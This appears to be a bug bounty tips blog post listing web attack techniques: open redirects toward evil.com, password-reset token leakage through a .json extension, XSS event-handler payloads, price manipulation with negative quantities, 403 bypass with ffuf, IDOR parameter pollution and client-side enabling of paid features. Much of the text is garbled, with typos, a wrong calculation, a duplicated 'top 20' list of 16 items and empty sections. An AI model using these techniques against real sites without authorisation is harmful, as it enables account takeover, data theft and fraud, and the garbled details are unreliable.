Expert Advice on Tracking Down Fugitives

Bounty Hunters’ Tips and Tricks: Expert Advice on Tracking Down Fugitives

1. Tips For Finding Open Redirect

Open redirect is probably one of the most common vulnerabilities in modern websites. Here, we are going to some some tips and tricks to find open redirect.

https://example.com/dir -> [ 200 ]

Here in the above example you can see that it is normal http request with status code 200, if indicates a succesfull http request.

https://example.com//dir -> http://dir [ 302 ]

If we one more forward slash (/) before the directory name we can see that the status code has change to 302, it indicates a redirect.

https://example.com//dir/anypage.com -> http://dtr/anypage.com [ 302 ]

After that, if you add any domain (e.g – anypage.com) after the end of the directory name it would redirect to that domain or malicious domain, it is a critical vulnerability and if you found it you will get a good bounty.

You can try some more tips for finding open redirect vulnerabilities.

https://example.com//dir/anypage -> http://dir/anypage [ 302 ]
https://example.com//[email protected] -> [ 404 ]
https://example.com//evil.com -> [ 404 ]

2. Sensitive data leakage using .json

- Request :
GET /ResetPassword HTTP/I.I
{ "email" : "[email protected]"}

- Response:
HTTP/1.1 200 0K

Here in the above example you can see that, the user has requested for password reset, for a victim’s email address and he has got a 200 response from it . The format here used is json, it is used to connect frontend with backend on the website.


- Request
GET /ResetPassword.json HTTP/ 1.1
{"email" : "[email protected]"}


- Response:
HTTP/I.1 200 0K
{ " success " : "true" , "token" : "596a96-cc7bf-9108c-d896f-33c44a-edc8a" }

In the above example you can see that the user has added .json at the end of page extension and he has got the auth token for that user now hw can takeover the victim’s account.

 

3. What can you after uploading

14.03.2023 21.29.48 REC

4. Top 20 Event Handlers to Trigger XSS

  1. onfocus=prompt( )
  2. onchange=prompt( )
  3. onmouseup=alert( )
  4. onkeydown=confirm( )
  5. onkeyup=prompt( )
  6. onblur=prompt( )
  7. onreset=alert( )
  8. onload=alert( )
  9. onclick=alert()
  10. onmouseover=confirm()
  11. onkeyup=prompt( )
  12. onMoveOn=confirm( )
  13. onabort=prompt( )
  14. onselect=prompt( )
  15. onsubmit=confirm( )
  16. onblur=prompt( )

 

5. Price Manipulation Method

I. Add two products to the basket [ Let’s consider a single product $40 ]
2. If the request is processed in this way: {“items” : {“laptop” : 1, “mobile” : 1}}
3. Change the JSON body to: {“items:”{“laptop”:4 , “mobile:-2”}}
4. The cost wilt become $20 for two items: 4 * $40 – 2 $70 = $160 – $140 = $20

6. Github Dorking Tips

When doing github recon, Don’t Just look on the repositories.

“Code” is the biggest one that mostly cause security vulnerabilities.

” Issues” is the second biggest, actually a gold mine.

” Comits “ are good too, take your time on them too.

6. 403 Find & Bypass Tips

Step 1:

In kali run this command for directory burte-forcing using ffuf

ffuf -u https://target.com/FUZZ -w /path/to/wordlist -fc 200, 301, 302 

Save the output in a 403.txt file

Step 2 :

Install this tool in kali called 403bypasser

for i in `cat fuzz.txt` ; do python3 403bypasser.py https://target.com/$i ; done 

After running this command wait for status code 200 or 301 . If you found 200 then you have bypassed the security and accessed the file.

 

 

 

7. A short story on admin access

  1. Run subscan got staging.target.com
  2. It has signup and login page after signup got redirected to target.com just a simple user account, no email verification needed.
  3. Use hunter.io got email like [email protected] Made account with this email on staging subdomain got access to admin dashboard with 13k+ users PII info.

8. Tips To Find IDOR

Suppose you find endpoint for IDOR
GET /api_vl /messages?user_id=your_user_id

Try this
“GET /api vl User_id”

Try this
“GET /api_vl/messages?
user_id=your_user_id&user_id=another_user_id”

Try this
“GET /api_vl/messages?
user-id=Another User-id User-id=your user-id”

Try this
“GET /api vl /messages?
user_idfl=Another_user_id&user_idO=your_userid”

9. Application Login Bugs

You don’t always need Inspecting a page can Burpsuite or proxy.

You don’t always need Burpsuite or proxy.

Inspecting a page can rain bounties.

  1. Application allows for free and paid feature.
  2. Only able to access free feature.
  3. Clicking paid feature, redirects to payment link for paid.
  4. Went back, checked the page via “Inspect element”
  5. Found a param as ‘disabled’
  6. Changed to ‘enabled’ .
  7. Access granted to paid feature.

10. Account Reset Using Password

Some of best courses recommended by us to boost your career ...

Shell Scripting course

Recon Course

Spread the love

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top
www.thecyberblogs.com